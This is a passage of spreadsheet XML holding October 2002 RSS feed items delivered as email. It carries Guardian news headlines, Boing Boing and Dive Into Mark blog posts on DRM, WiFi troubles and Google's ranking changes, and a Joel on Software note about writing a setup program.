    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:02:11 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:02:11 -0000</t>
  </si>
  <si>
    <t>Enron finance chief is handcuffed</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],7,215/\nDate: 2002-10-03T04:21:00+01:00\n\n*Business:* Federal prosecutors in the US have filed charges against the \nhighest ranking Enron executive yet.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:02:08 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:02:08 -0000</t>
  </si>
  <si>
    <t>Cypriot leaders in last-ditch attempt at unification</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],5,215/\nDate: 2002-10-03T04:21:02+01:00\n\n*World latest:* The ethnic Greek and Turkish leaders of Cyprus will hold \ncrucial talks today in an effort to reunite the island.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:02:00 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:02:00 -0000</t>
  </si>
  <si>
    <t>Currie returns to pile scorn on Major</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],4,215/\nDate: 2002-10-03T04:21:03+01:00\n\n*Politics:* Ex-lover tours studios to denounce former PM.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:01:59 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:01:59 -0000</t>
  </si>
  <si>
    <t>UK 'should ban nuclear arms'</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],3,215/\nDate: 2002-10-03T04:21:04+01:00\n\n*UK latest:* The government should immediately announce that Britain will \nabandon nuclear weapons when the Trident missile system is phased out, say a \ngroup of eminent scientists.</t>
  </si>
  <si>
    <t>Call this a party?</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],2,215/\nDate: 2002-10-03T04:21:05+01:00\n\nBill Clinton and a tale of two Tonys. *Howard Jacobson* on his first Labour \nparty conference.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:01:58 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:01:58 -0000</t>
  </si>
  <si>
    <t>Clinton: Blair's the man to trust</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],1,215/\nDate: 2002-10-03T04:21:06+01:00\n\nBill Clinton uses his Labour conference speech to urge George Bush to persevere \nwith the UN.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:01:57 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:01:57 -0000</t>
  </si>
  <si>
    <t>Iraq invasion a 'hair-trigger' away</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],0,215/\nDate: 2002-10-03T04:21:07+01:00\n\nWashington has revealed its intention to use UN weapons inspections as a \npossible first step towards a military occupation of Iraq.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: gamasutra &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:01:56 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:01:56 -0000</t>
  </si>
  <si>
    <t>Shader Integration: Merging Shading Technologies on the Nintendo</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8494551,159/\nDate: 2002-10-03T05:50:07+01:00\n\nRendering polygons is not as easy as it used to be, the reason being the vast \namount of different rendering techniques, methods and algorithms available. Not \nonly is choosing the right ones a problem, even worse, all that are selected \nneed to work together. There are some algorithms which simply do not work \ntogether, and in that case, only one may be used whilt the other one needs to \nbe replaced witha more compatible method. This feature explores how Factor 5 \napproached the problem when developing Rogue Leader for Gamecube.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: joelonsoftware &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:01:42 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:01:42 -0000</t>
  </si>
  <si>
    <t>I've been snowed under for the last four weeks, working on the</t>
  </si>
  <si>
    <t>URL: [URL]http://www.joelonsoftware.com[/URL]\nDate: Not supplied\n\nI've been snowed under for the last four weeks, working on the FogBUGZ 3.0 \nSetup program. \n\nFor various reasons none of the commercial setup toolkits (Wise, InstallShield, \nWindows Installer) could do even 25% of what our setup program needed to do, so \nI ended up writing it from scratch. VC++ and MFC all the way. It took longer \nthan I expected because I had this weird conviction that the entire setup \nprocess should be completely reversable, and as you go backwards through the \nwizard it should automatically and silently undo any changes it had already \nmade. So even if you're looking at the last screen, if you decide you want to \nchange where to extract the files, you can just back up and change it and \neverything moves and all the old files you overwrote are put back and all the \nWindows accounts you created are uncreated and all the permissions we granted \nare ungranted and the SQL database you made is unmade and so on. The end result \nis a great setup program, but it may be a tad overkill. If I have time I'll \nwrite more about what I learned. \n\n  \n\nOne benefit of writing a setup program from scratch is that I don't have to \nhave someone else's stupid cartoon-of-a-computer-and-floppy-disks in the upper \nright hand corner. I used a photograph of the London Skyline, currently \ninfested with cranes. I took the picture from the cafe at the Tate Modern. \n\n \n\n[IMG: [URL]http://www.joelonsoftware.com[/URL] (FogBUGZ 3.0 Setup)]</t>
  </si>
  <si>
    <t>http://www.joelonsoftware.com http://www.joelonsoftware.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:01:31 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:01:31 -0000</t>
  </si>
  <si>
    <t>Don't do the brown WiFi, the brown WiFi is BAD</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nRob "Pringles Can" Flickenger and others at the O'Reilly OS X con have tracked \ndown the cause of the annoying flakiness in the wireless network here -- every \n20 or 30 seconds, you start getting "connection refused" messages from your \nbrowser and other net-utilities. \n\nIt turns out that running the great network-spy app Etherpeg[1] (or other \n"promiscuous" network sniffers) and the built-in firewall in OS X at the same \ntime causes your computer to begin intercepting every packet sent out on your \nsegment of the wireless network and respond to it with a "rejected" message. \n\nSo today, Rob (and everyone else who knows about this) is going to run around \nand tell people running Etherpeg to _turn off the firewall_ (and vice-versa). \nAh, fickle networking, you are such a stern mistress! Link[2] Don't do the \nbrown WiFi, the brown WiFi is BAD (_Thanks, Rob!_)\n\n[1] [URL]http://www.oreillynet.com[/URL]\n[2] [URL]http://www.oreillynet.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.oreillynet.com http://www.oreillynet.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:01:24 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:01:24 -0000</t>
  </si>
  <si>
    <t>Vintage Music Archive</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nDismuke has a 24 hour radio station and RealAudio archive of '20s and '30s \nmusic. Some nice stuff in here. (Also check out my favorite music archive, Red \nHot Jazz[1].) Link[2] Discuss[3]\n\n[1] [URL]http://boingboing.net[/URL]\n[2] [URL]http://dismuke.org[/URL]\n[3] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://boingboing.net http://dismuke.org http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:01:20 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:01:20 -0000</t>
  </si>
  <si>
    <t>Notes from OSXCon's DRM and Digital Hub panel</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nWe did a great panel on DRM and the Digital Hub yesterday here at OSXCon with \nTim O'Reilly, Victor Nemachek (from El Gato, makers of the EyeTV digital TV \nrecorder for the Mac), Dan Gillmor, and JD Lasica, who's working on a book on \nfair use and copyfights. Glenn "802.11b Networking News" Fleishman took great \nnotes through the talk: \n\n    Dan: Tim, you're a "content or copyright holdertalk about these issues." \n\n    Obscurity can be a tool. Something like 100K books published in the US. \n    Most books are forgotten after publication. Ravening copying theft is \n    wrong: most aren't pirated. Publishers puts book that someone sweated over \n    for years on shelves for three months, doesn't sell, that's it, and the \n    author has no rights. Publishers keeps rights til out of print, etc. \n\n    Oblivion is fate of most books: "Piracy would be the best thing for those \n    books." People wouldn't pirate them in general, because people generally \n    like to respect the rights of creators. "Piracy is a marginal act; it takes \n    away some of the cream." \n\n    Publishing won't go away, but it will change the idea of who is a \n    publisher. Early on in the Web, the idea was that everyone could be a \n    publisher. The way in which Web sites interact with publishers is often \n    very much like the way that book publishers try to get placement and \n    position in bookstores. \n\n    Publishing is aggregation. People will re-emerge as publishers. Will \n    Hollywood be the publishers of the future or will someone else? \n\n    Users are voting by their use of programs like Kazaa. Eventually, media \n    companies will adopt. But if the changes are hardcoded into law, then we're \n    stuck for a long time with "some mistakes."  \n\nLink[1] Discuss[2] (_via Dan Gillmor's eJournal[3]_)\n\n[1] [URL]http://blog.glennf.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]\n[3] [URL]http://www.siliconvalley.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://blog.glennf.com http://www.quicktopic.com http://www.siliconvalley.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:01:09 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:01:09 -0000</t>
  </si>
  <si>
    <t>Gillmor: Apple's fair-use friendly OS?</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nDan Gillmor's column this week is all about Apple's burgeoning resistance to \nthe Hollywood onslaught on general-purpose computing: \n\n    Intel's doing it. Advanced Micro Devices is doing it. Microsoft is doing \n    it. \n\n    Apple Computer isn't. \n\n    What's Apple not doing? It's not -- at least so far -- moving toward an \n    anti-customer embrace with Hollywood's movie studios and the other members \n    of the powerful entertainment cartel.  \n\nLink[1] Discuss[2]\n\n[1] [URL]http://www.siliconvalley.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.siliconvalley.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:01:08 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:01:08 -0000</t>
  </si>
  <si>
    <t>Sidekick, your mobile blogging pal</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\n[IMG: [URL]http://www.craphound.com[/URL]] The T-Mobile Sidekick and \nother instances of the Danger Hiptop PDA/Phone are being promoted as mobile \nblogging tools. Link[1] Discuss[2] (_via Hack the Planet[3]_) \n\n\n[1] [URL]http://www.hiptop.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]\n[3] [URL]http://wmf.editthispage.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.craphound.com http://www.hiptop.com http://www.quicktopic.com http://wmf.editthispage.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:01:06 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:01:06 -0000</t>
  </si>
  <si>
    <t>Mathematics film-festival in October in Berkeley</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nAll through October, Berkeley's Mathematical Sciences Research Institute is \nhosting Cinemath, a mathematics film festival: \n\n    Permutations and Configurations: A Calculated Cinema \n\n    In this avant-garde subset of Cinemath, we explore films that have been \n    constructed using mathematical concepts both simple and complex- geometric \n    permutations, musical frameworks, even topography are among the strategies \n    that have been employed to compose and sequence film frames. Filmmakers \n    such as Oskar Fischinger and Walther Ruttmann created some of the earliest \n    avant-garde films by multiplying, dividing, and otherwise transforming \n    abstract images- including spirals, rectangles, and circles to produce \n    dynamic rhythms and harmonies. Today such visual music and motion graphics \n    are the currency of digital graphics. Anthony McCall's film performances \n    such as Line Describing a Cone create 3-D geometric shapes into which the \n    viewer can literally step. We also explore films by pioneers of \n    machine-generated and computer-produced animation (Norman McLaren, James \n    and John Whitney, Stan Vanderbeek) as well as works by contemporary \n    animators who use the computer to either generate or pattern images (Larry \n    Cuba, Paul Glabicki, James Otis). Peter Kubelka, Taka Iimura, and Standish \n    Lawder use the frame as the unit with which they create editing patterns, \n    while Kurt Kren and Paul Sharits reckon on arithmetic systems to variously \n    calculate compositional or editing patterns. Bette Gordon, Hollis Frampton, \n    and Bruce Elder figure in algorithms, group theory, and set theory to \n    graphically enliven the frame or to structure their films. While no \n    mathematical knowledge is required to enjoy these films, we count on you to \n    try to calculate the mathematical systems employed!  \n\nLink[1] Discuss[2] (_Thanks, Jef[3]!_)\n\n[1] [URL]http://www.msri.org[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]\n[3] [URL]http://www.acme.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.msri.org http://www.quicktopic.com http://www.acme.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:01:03 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:01:03 -0000</t>
  </si>
  <si>
    <t>Fight Piracy -- Regulate Potty Chairs!</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\n&gt;&gt;From Ed Felten's "Freedom to Tinker" site, regarding the TinkleToonz Musical \nPotty.: \n\n    This handy toilet training aid offers a "magical, musical land of potty \n    training," by playing a tune whenever liquid is deposited in it. Since it \n    plays digital audio, it qualifies for regulation as a "digital media \n    device" under the Hollings CBDTPA. If the CBDTPA passes, any newly \n    manufactured TinkleToonz Musical Potties will have to incorporate \n    government-approved copy protection technology.  \n\nLink[1] Discuss[2]\n\n[1] [URL]http://www.freedom-to-tinker.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.freedom-to-tinker.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:01:00 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:01:00 -0000</t>
  </si>
  <si>
    <t>Blog de jeanpoole interviews Mark</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nHere's a brief interview with me.  \n\n    *Interviewer:* If the Boing Boing zine and blog were TV characters, who'd \n    they be, and how'd they get on? \n\n    *Mark:* The zine would be Jethro Bodine of "The Beverly Hillbillies" -- \n    curious, neophilic, xenophilic, gleeful, and eager to adopt any new theory \n    or conspiracy as the absolute truth. The Blog would be Sherman from \n    "Peabody's Improbable History" -- a traveler of time and space in search of \n    beauty, truth, and the outre. I think Jethro bOING bOING and Sherman Boing \n    Boing would be great pals. Jethro would invite Sherman's dog, Mr. Peabody, \n    to go raccoon hunting with him, and Sherman would send Jethro 40 years into \n    the future to hang out at the Playboy Mansion.  \n\nLink[1] Discuss[2]\n\n[1] [URL]http://www.octapod.org[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.octapod.org http://www.quicktopic.com</t>
  </si>
  <si>
    <t>Comics Journal interviews Ted Rall</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nInterview with cartoonist Ted Rall, who has traveled to South Asia recently, \nand has tips on how to deal with bribe-hungry border guards and the like: \n\n    Rall: Now I realize that's just the way it is, and I know how to do it and \n    get away without paying a bribe, or paying something very modest. You have \n    to show them that you know the routine and that you know you don't have to \n    give them anything, and just have a low-key demeanor. But if you get angry, \n    that's just going to make things worse for you. You get out of your vehicle \n    and you walk up to them -- you don't try to avoid these guys; you don't try \n    to avoid their eyes -- you go up with a big smile, give them a big \n    handshake and sort of rub their shoulders and say, "Hey, great to see you. \n    You're my new best friend for the next five minutes." \n\n    GROTH: Basically act like a used car salesman. \n\n    RALL: It's exactly like that! You always carry cigarettes. You offer them a \n    cigarette, and you say, "Hey, what's goin' on? How's it goin'? Great. \n    Here's my documents. How's the road?" Just small talk, because these guys \n    are bored. They're in the middle of nowhere, and you're sometimes the only \n    vehicle they've seen for many hours. They're often very drunk, so you just \n    have to be cool.  \n\nLink[1] Discuss[2]\n\n[1] [URL]http://www.tcj.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.tcj.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:00:59 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:00:59 -0000</t>
  </si>
  <si>
    <t>Catalog of Tomorrow released</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nMark and I were two of many wonderful contributors to a new book from TechTV, \ncalled "The Catalog of Tomorrow." It's like a Whole Earth Catalog for \nfuturistic technologies, with great illustrated spreads throughout -- you can \nget a peek inside at Amazon[1], and buy from Powell's or your other favorite \nindie store. Link[2] Discuss[3] (_Thanks, Andrew!_)\n\n[1] [URL]http://www.amazon.com[/URL]\n[2] [URL]http://www.powells.com[/URL]\n[3] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.amazon.com http://www.powells.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:00:58 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:00:58 -0000</t>
  </si>
  <si>
    <t>NYT discovers Linux in late 2002</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nNYT op-ed piece about this newfangled OS called Linux and how it is developed \nusing something called the "open source" method. This is the paper to go to for \nbreaking news, folks. Link[1] Discuss[2] _(Thanks, Dave!)_\n\n[1] [URL]http://www.nytimes.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.nytimes.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: diveintomark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:00:33 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:00:33 -0000</t>
  </si>
  <si>
    <t>Cast not the first stone</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-10-02T09:30:52-05:00\n\nFirst Blood is Spilled at Record Industry Hearings[1]. &amp;#8220;In a shocking \nstatement made by Back Street Boy, Kevin Richardson, he testified that they \nhave NEVER received a royalty check, and that they only took a large advance \nafter their third hit album in a row failed to earn them a penny in \nroyalties.&amp;#8221;\n\n\n\n[1] [URL]http://www.musicdish.com[/URL]</t>
  </si>
  <si>
    <t>http://diveintomark.org http://www.musicdish.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: diveintomark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:00:31 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:00:31 -0000</t>
  </si>
  <si>
    <t>Switcher</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-10-02T09:32:48-05:00\n\n_Phil Ringnalda_, in an unrelated discussion about RSS namespaces[1]: \n&amp;#8220;Looks like [yet another person] decided to switch to NetNewsWire Lite. \nDoes it come with crack, or what?&amp;#8221;\n\n\n\n[1] [URL]http://groups.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://diveintomark.org http://groups.yahoo.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: diveintomark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:00:20 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:00:20 -0000</t>
  </si>
  <si>
    <t>Insanely complicated</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-10-02T09:34:51-05:00\n\n_Ian Hickson_: My faceless enemy has been defeated[1]. &amp;#8220;My arch nemesis \nover the last couple of weeks has been the very poorly documented Hebrew \nTraditional Numbering System.&amp;#8221;\n\n\n\n[1] [URL]http://ln.hixie.ch[/URL]</t>
  </si>
  <si>
    <t>http://diveintomark.org http://ln.hixie.ch</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: diveintomark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:00:15 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:00:15 -0000</t>
  </si>
  <si>
    <t>RDF redux</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-10-02T09:42:39-05:00\n\nI think I'm going to become one of _those_ people. You know, one of those \npeople who has a &amp;#8220;Semantic Web&amp;#8221; category on their weblog. This will \nbe a Geek Purity Test question someday. Onward: \n\n- _Phil Ringnalda_: Fun with RDF[1]. &amp;#8220;RDF can actually be fun, as long as \nyou don't foolishly invest too much ego in trying to store RSS 1.0, or wander \noff into flame wars.&amp;#8221; From which we find: \n- _Shelley Powers_: The RDF Query-O-Matic[2], and The RDF Query-O-Matic \nexplained[3]. &amp;#8220;The Query-o-Matic accepts the name of an RDF file (any \nvalid RDF file), and an RDFQL (RDF Query Language) query, and will print out a \ntest value found as a result of that query.&amp;#8221; \n- _Marcus Campbell_: &amp;#8220;My FOAF autocreation script is moving along nicely\n[4]. It's now looping through my OPML blogroll file, checking the first load of \nbites in people's pages for head linked FOAF files, grabbing certain elements \nfrom these files (if they have one) and spitting them out into a brand new FOAF \nfile for me.&amp;#8221; \n- _Joe Gregorio_: The Well-Formed Web[5]. &amp;#8220;After spending some time \nbadgering poor Bill Kearney for a concrete benefit of having RDF in RSS 1.0 and \nnot getting a really satisfactory answer I went back and read Paul Ford's essay \nagain. I wanted to get that old religious feeling back again. It didn't work. \nThe magic was gone.&amp;#8221; \n\n\n\n\n\n[1] [URL]http://philringnalda.com[/URL]\n[2] [URL]http://weblob.burningbird.net[/URL]\n[3] [URL]http://weblog.burningbird.net[/URL]\n[4] [URL]http://www.ninjakitten.net[/URL]\n[5] [URL]http://bitworking.org[/URL]</t>
  </si>
  <si>
    <t>http://diveintomark.org http://philringnalda.com http://weblob.burningbird.net http://weblog.burningbird.net http://www.ninjakitten.net http://bitworking.org</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: diveintomark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:00:11 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:00:11 -0000</t>
  </si>
  <si>
    <t>Reunion</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-10-02T09:43:36-05:00\n\n_Leslie Harpold_: This Too, Shall Pass[1]. &amp;#8220;There's a rumor that my \npossessions and I will be reunited in about a week.&amp;#8221;\n\n\n\n[1] [URL]http://leslie.harpold.com[/URL]</t>
  </si>
  <si>
    <t>http://diveintomark.org http://leslie.harpold.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: diveintomark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:00:07 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:00:07 -0000</t>
  </si>
  <si>
    <t>Smitten</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-10-02T09:49:49-05:00\n\n_Heather Hamilton_: Hypochondriac[1]. &amp;#8220;It is because of my dog that I \nhave been smitten with an Ovarian Cyst&amp;reg;; it is because of my dog that my \nhusband can't breathe with phlegm-free lungs. I can safely blame the dog for \neverything.&amp;#8221;\n\n\n\n[1] [URL]http://www.dooce.com[/URL]</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: diveintomark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:00:06 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:00:06 -0000</t>
  </si>
  <si>
    <t>Best served cold</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-10-02T09:51:54-05:00\n\nThank you[1]. I needed that. We now return you to your regularly scheduled \nprogramming.\n\n\n\n[1] [URL]http://www.daypop.com[/URL]</t>
  </si>
  <si>
    <t>http://diveintomark.org http://www.daypop.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: diveintomark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:00:05 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:00:05 -0000</t>
  </si>
  <si>
    <t>When an engineer flaps his wings</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-10-03T01:31:51-05:00\n\nRemember that saying from chaos theory about how when a butterfly flap its \nwings, it can cause a hurricane a month later halfway around the world? As \nseveral people have already noted, Google has made some major changes in their \nmost recent update. The weblogging community was hit hard (for instance, I used \nto be the #1 "mark"[1]; I am now #6). The changes appear to be the result of an \nattempt to stop two phenomena: explicitly selling ads based on PageRank[2], and \nGoogle bombing[3]. \n\nSpecifically, Google is now apparently cross-checking link text with the linked \nsite, and discounting or ignoring links whose text does not appear in the \nlinked site. This all but kills off Google bombing. Searching for "go to hell"\n[4] no longer takes you to microsoft.com[5]; searching for "talentless hack"[6] \nno longer finds ohmessylife.com[7], although it finds a lot of people who were \npreviously participating in the Google bombing. No definitive word yet on \nwhether Google is actively penalizing such sites. \n\nUnfortunately, the algorithm tweaks necessary to stop these two techniques have \ncaused a wide range of collateral damage, apparently coming down hardest on \nmedium-to-large sites that had previously been doing everything right (as far \nas page structure, link structure, accessibility, and general honest hard work \nputting together a usable and useful site). The Webmasterworld forums are alive \nwith complaints and speculation: \n\n- New update, pagerank death?[8] \n- September 2002 Google Update Discussion - part 1[9] \n- Let's find out what happened - Sept 2002 Update - pt. 2[10] \n\n(Side note: amongst the confusion, it has been suggested that Google is no \nlonger indexing ALT text in images. I can confirm that this is absolutely \nfalse. Searching diveintomark.org for "gimli"[11] finds my entry of July 29[12]\n, where "Gimli" is mentioned only in the ALT text of an image.) \n\nRegardless, Google's search results in general appear to be significantly \ndegraded in many key areas. The forums are full of people complaining that spam \nsites, doorway pages, and obvious cloaking attempts, which Google used to be so \ngood at filtering out, are now popping up in top spots with disturbing \nfrequency. Nobody in the forums wants to talk about which keywords they're \ntracking, so I tried to find my own concrete example of crap search results. It \ndidn't take long. \n\n- Searching for reservation hotel[13] brings up an empty sub-page[14] of a \nhotel reservation company in Italy[15] as the first result. This seems \nunhelpful, and unlikely to be relevant to the average US-based consumer (and \nGoogle absolutely knows I'm in the US based on my IP address). \n- Searching for news observer nc[16] (the News &amp; Observer is a Raleigh, NC \nnewspaper) does find The News &amp; Observer[17], but it also finds an Internet \nbetting spam page[18] at #7 and a non-existent page[19] at #9. \n- Searching for eminem[20] gives us two generic portal pages, a non-existent \nsite, and a site that redirects to a site that continuously redirects to itself \n(I am not making this up). And this is just on the first page. Good thing I \ndidn't care that much about Eminem to begin with, because Google just isn't \nthat helpful. \n\nMany people in the Webmasterworld forums are now suggesting that AllTheWeb.com\n[21] has better search results overall. Just as a single comparison, their \nresults for "eminem"[22] do appear to be much more relevant. Is this the \nbeginning of the end of Google's reign?\n\n\n\n[1]  [URL]http://www.google.com[/URL]\n[2]  [URL]http://www.pradnetwork.com[/URL]\n[3]  [URL]http://uber.nu[/URL]\n[4]  [URL]http://www.google.com[/URL]\n[5]  [URL]http://www.microsoft.com[/URL]\n[6]  [URL]http://www.google.com[/URL]\n[7]  [URL]http://www.ohmessylife.com[/URL]\n[8]  